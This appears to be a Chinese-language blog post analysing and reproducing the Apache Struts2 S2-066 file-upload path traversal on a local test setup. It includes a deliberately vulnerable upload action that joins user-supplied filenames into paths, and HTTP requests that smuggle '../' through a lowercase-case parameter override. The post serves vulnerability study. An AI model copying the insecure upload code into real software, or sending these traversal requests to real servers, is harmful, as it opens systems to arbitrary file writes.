<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="漏洞描述攻击者可以操纵文件上传参数来启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。 解决方案：升级到 Struts 2.5.33、6.3.0.2 或更高版本。">
<meta property="og:type" content="article">
<meta property="og:title" content="s2-066分析与复现">
<meta property="og:url" content="http://example.com/2024/12/18/s2-066%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="ycxlo&#39;s Blog">
<meta property="og:description" content="漏洞描述攻击者可以操纵文件上传参数来启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。 解决方案：升级到 Struts 2.5.33、6.3.0.2 或更高版本。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218111654756.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218111813731.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218112242352.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218134130658.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218134550143.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218141321825.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218141733052.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218142357753.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218142410287.png">
<meta property="og:image" content="https://ilikeoyt.github.io/image/image-20241218144738307.png">
<meta property="article:published_time" content="2024-12-18T03:09:12.000Z">
<meta property="article:modified_time" content="2025-05-25T03:22:28.129Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ilikeoyt.github.io/image/image-20241218111654756.png">

<link rel="canonical" href="http://example.com/2024/12/18/s2-066%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>s2-066分析与复现 | ycxlo's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ycxlo's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/12/18/s2-066%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ycxlo's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          s2-066分析与复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-12-18 11:09:12" itemprop="dateCreated datePublished" datetime="2024-12-18T11:09:12+08:00">2024-12-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-05-25 11:22:28" itemprop="dateModified" datetime="2025-05-25T11:22:28+08:00">2025-05-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>攻击者可以操纵文件上传参数来启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。</p>
<p>解决方案：升级到 Struts 2.5.33、6.3.0.2 或更高版本。</p>
<span id="more"></span>

<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>以6.3.0为例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">      &lt;groupId&gt;org.apache.struts&lt;/groupId&gt;</span><br><span class="line">      &lt;artifactId&gt;struts2-core&lt;/artifactId&gt;</span><br><span class="line">      &lt;version&gt;6.3.0&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure>

<p>UploadAction.java</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">package com.struts2;</span><br><span class="line"></span><br><span class="line">import com.opensymphony.xwork2.ActionSupport;</span><br><span class="line">import org.apache.commons.io.FileUtils;</span><br><span class="line">import org.apache.struts2.ServletActionContext;</span><br><span class="line"></span><br><span class="line">import java.io.*;</span><br><span class="line"></span><br><span class="line">public class UploadAction extends ActionSupport &#123;</span><br><span class="line"></span><br><span class="line">    private static final long serialVersionUID = 1L;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    private File upload;</span><br><span class="line"></span><br><span class="line">    // 文件类型，为name属性值 + ContentType</span><br><span class="line">    private String uploadContentType;</span><br><span class="line"></span><br><span class="line">    // 文件名称，为name属性值 + FileName</span><br><span class="line">    private String uploadFileName;</span><br><span class="line"></span><br><span class="line">    public File getUpload() &#123;</span><br><span class="line">        return upload;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public void setUpload(File upload) &#123;</span><br><span class="line">        this.upload = upload;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public String getUploadContentType() &#123;</span><br><span class="line">        return uploadContentType;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public void setUploadContentType(String uploadContentType) &#123;</span><br><span class="line">        this.uploadContentType = uploadContentType;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public String getUploadFileName() &#123;</span><br><span class="line">        return uploadFileName;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public void setUploadFileName(String uploadFileName) &#123;</span><br><span class="line">        this.uploadFileName = uploadFileName;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public String doUpload() &#123;</span><br><span class="line">        String path = ServletActionContext.getServletContext().getRealPath(&quot;/&quot;)+&quot;upload&quot;;</span><br><span class="line">        System.out.println(path);</span><br><span class="line">        String realPath = path + File.separator +uploadFileName;</span><br><span class="line">        try &#123;</span><br><span class="line">            FileUtils.copyFile(upload, new File(realPath));</span><br><span class="line">        &#125; catch (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        return SUCCESS;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>structs.xml</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE struts PUBLIC</span><br><span class="line">        &quot;-//Apache Software Foundation//DTD Struts Configuration 2.0//EN&quot;</span><br><span class="line">        &quot;http://struts.apache.org/dtds/struts-2.0.dtd&quot;&gt;</span><br><span class="line">&lt;struts&gt;</span><br><span class="line">    &lt;package name=&quot;upload&quot; extends=&quot;struts-default&quot;&gt;</span><br><span class="line">        &lt;action name=&quot;upload&quot; class=&quot;com.struts2.UploadAction&quot; method=&quot;doUpload&quot;&gt;</span><br><span class="line">            &lt;result name=&quot;success&quot; type=&quot;&quot;&gt;/index.jsp&lt;/result&gt;</span><br><span class="line">        &lt;/action&gt;</span><br><span class="line">    &lt;/package&gt;</span><br><span class="line">&lt;/struts&gt;</span><br></pre></td></tr></table></figure>

<p>web.xml</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE web-app PUBLIC</span><br><span class="line"> &quot;-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN&quot;</span><br><span class="line"> &quot;http://java.sun.com/dtd/web-app_2_3.dtd&quot; &gt;</span><br><span class="line"></span><br><span class="line">&lt;web-app&gt;</span><br><span class="line">  &lt;display-name&gt;Archetype Created Web Application&lt;/display-name&gt;</span><br><span class="line">  &lt;filter&gt;</span><br><span class="line">    &lt;filter-name&gt;struts2&lt;/filter-name&gt;</span><br><span class="line">    &lt;filter-class&gt;org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter&lt;/filter-class&gt;</span><br><span class="line">  &lt;/filter&gt;</span><br><span class="line">  &lt;filter-mapping&gt;</span><br><span class="line">    &lt;filter-name&gt;struts2&lt;/filter-name&gt;</span><br><span class="line">    &lt;url-pattern&gt;*.action&lt;/url-pattern&gt;</span><br><span class="line">  &lt;/filter-mapping&gt;</span><br><span class="line">&lt;/web-app&gt;</span><br></pre></td></tr></table></figure>

<p>项目结构：</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218111654756.png" alt="image-20241218111654756"></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>将2.5.33与2.5.32版本进行diff</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218111813731.png" alt="image-20241218111813731"></p>
<p>关注到第二个commit，让HttpParameters不区分大小写，先尝试执行一次正常的上传文件请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">POST /s2_066_war_exploded/upload.action HTTP/1.1</span><br><span class="line">Host: localhost:8080</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------366355993718908300011858789275</span><br><span class="line">Content-Length: 223</span><br><span class="line">Origin: http://localhost:8080</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://localhost:8080/s2_066_war_exploded/</span><br><span class="line">Cookie: JSESSIONID=AF1F79D45AD1151557B3E7EF9E09A54F</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Priority: u=0, i</span><br><span class="line"></span><br><span class="line">-----------------------------366355993718908300011858789275</span><br><span class="line">Content-Disposition: form-data; name=&quot;Upload&quot;; filename=&quot;ycx.txt&quot;</span><br><span class="line">Content-Type: text/xml</span><br><span class="line"></span><br><span class="line">123&gt;</span><br><span class="line">-----------------------------366355993718908300011858789275--</span><br></pre></td></tr></table></figure>

<p>成功上传到upload目录</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218112242352.png" alt="image-20241218112242352"></p>
<p>结合漏洞描述与commit，漏洞大概可能是目录穿越与大小写造成的问题，尝试将filename修改为“..&#x2F;ycx1.txt”，发现依旧是上传至upload目录，并未实现目录穿越。</p>
<p>structs2对于文件上传有一个默认的拦截器，存在于struts-defaults.xml</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;interceptor name=&quot;fileUpload&quot; class=&quot;org.apache.struts2.interceptor.FileUploadInterceptor&quot;/&gt;</span><br></pre></td></tr></table></figure>

<p>在FileUploadInterceptor#intercept方法处下个断点，进行调试</p>
<p>简单的过了一下，在AbstractMultiPartRequest#getCanonicalName方法发现对上传文件名进行了过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">protected String getCanonicalName(String originalFileName) &#123;</span><br><span class="line">        int forwardSlash = originalFileName.lastIndexOf(47);</span><br><span class="line">        int backwardSlash = originalFileName.lastIndexOf(92);</span><br><span class="line">        String fileName;</span><br><span class="line">        if (forwardSlash != -1 &amp;&amp; forwardSlash &gt; backwardSlash) &#123;</span><br><span class="line">            fileName = originalFileName.substring(forwardSlash + 1);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            fileName = originalFileName.substring(backwardSlash + 1);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        return fileName;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>首先是找到<code>/</code>或者<code>\</code>的位置，然后从该符号后面开始截取，对文件穿越进行了拦截</p>
<p>随后将文件的一些信息保存到了acceptedFiles、acceptedContentTypes、acceptedFileNames三个变量中</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218134130658.png" alt="image-20241218134130658"></p>
<p>然后经过param的封装，被传入到HttpParameters</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218134550143.png" alt="image-20241218134550143"></p>
<p>此时这个HttpParameters对象是通过上下文获取的，也就是说如果我们在发出请求时就传入某些参数，那么就有可能覆盖此时append的参数</p>
<p>我们可以尝试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">POST /s2_066_war_exploded/upload.action?UploadFileName=../ycx2.txt HTTP/1.1</span><br><span class="line">Host: localhost:8080</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------366355993718908300011858789275</span><br><span class="line">Content-Length: 227</span><br><span class="line">Origin: http://localhost:8080</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://localhost:8080/s2_066_war_exploded/</span><br><span class="line">Cookie: JSESSIONID=AF1F79D45AD1151557B3E7EF9E09A54F</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Priority: u=0, i</span><br><span class="line"></span><br><span class="line">-----------------------------366355993718908300011858789275</span><br><span class="line">Content-Disposition: form-data; name=&quot;Upload&quot;; filename=&quot;ycx2.txt&quot;</span><br><span class="line">Content-Type: text/xml</span><br><span class="line"></span><br><span class="line">123&gt;</span><br><span class="line">-----------------------------366355993718908300011858789275--</span><br></pre></td></tr></table></figure>

<p>但是并未覆盖成功</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218141321825.png" alt="image-20241218141321825"></p>
<p>究其原因是ac.getParameters()发生在append之前，也就不存在覆盖了，再结合commit，我们再试一下小写</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218141733052.png" alt="image-20241218141733052"></p>
<p>可以看到此时的HttpParameters已经存在4个参数，但是这里还没有发生覆盖，只能继续向下看看，此时interceptor已经执行完毕，步入我们自己写的UploadAction</p>
<p>这里引用<a target="_blank" rel="noopener" href="https://freebuf.com/vuls/395314.html%E7%9A%84%E4%B8%80%E5%8F%A5%E8%AF%9D%EF%BC%9A">https://freebuf.com/vuls/395314.html的一句话：</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UploadAction即是Action又是Entity。而在Entity的实例化过程中，必然是通过setXX属性来赋值。所以就有了setUploadFileName（注意首字母大写）和setuploadFileName（注意首字母小写）的需求 。而在Entity的setter与getter中，这两种需求都会被当做一种，即setUploadFileName，因此覆盖也就发生了。</span><br></pre></td></tr></table></figure>

<p>第一次被赋值为<code>ycx2.txt</code>，第二次是<code>../ycx2.txt</code></p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218142357753.png" alt="image-20241218142357753"><img src="https://ilikeoyt.github.io/image/image-20241218142410287.png" alt="image-20241218142410287"></p>
<p>为什么要使用uploadFileName这样固定的字符串呢？在处理setter参数时，会调用到OgnlRuntime#capitalizeBeanPropertyName方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">char first = propertyName.charAt(0);</span><br><span class="line">char second = propertyName.charAt(1);</span><br><span class="line">if (Character.isLowerCase(first) &amp;&amp; Character.isUpperCase(second)) &#123;</span><br><span class="line">    return propertyName;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    char[] chars = propertyName.toCharArray();</span><br><span class="line">    chars[0] = Character.toUpperCase(chars[0]);</span><br><span class="line">    return new String(chars);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果属性第一个字符小写第二个大写直接返回，否则返回时将第一个字母大写，由于我们写的是setUploadFileName，所以传入的参数名只能是UploadFileName或者uploadFileName</p>
<p>另外再提一点，HttpParameters实际是一个TreeMap，在存储时，大写字母会被排在前面</p>
<p><img src="https://ilikeoyt.github.io/image/image-20241218144738307.png" alt="image-20241218144738307"></p>
<p>所以才会出现大写先于小写被调用</p>
<p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/">https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/395314.html">https://www.freebuf.com/vuls/395314.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/387790.html">https://www.freebuf.com/articles/web/387790.html</a></p>
<p><a target="_blank" rel="noopener" href="https://ilikeoyt.github.io/2024/11/25/Springboot%E4%B8%8B%E5%86%99%E6%96%87%E4%BB%B6RCE/"> Springboot下写文件RCE</a></p>
<p><a target="_blank" rel="noopener" href="https://ilikeoyt.github.io/2024/12/20/JS%E9%80%86%E5%90%91%E5%AE%9E%E6%88%98-1/">JS逆向实战-1 </a></p>
<p>© 2024 ycxlo</p>
<p>Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> &amp; <a target="_blank" rel="noopener" href="https://muse.theme-next.org/">NexT.Muse</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/11/25/Springboot%E4%B8%8B%E5%86%99%E6%96%87%E4%BB%B6RCE/" rel="prev" title="Springboot下写文件RCE">
      <i class="fa fa-chevron-left"></i> Springboot下写文件RCE
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/12/20/JS%E9%80%86%E5%90%91%E5%AE%9E%E6%88%98/" rel="next" title="JS逆向实战">
      JS逆向实战 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">2.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">漏洞分析</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">58</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
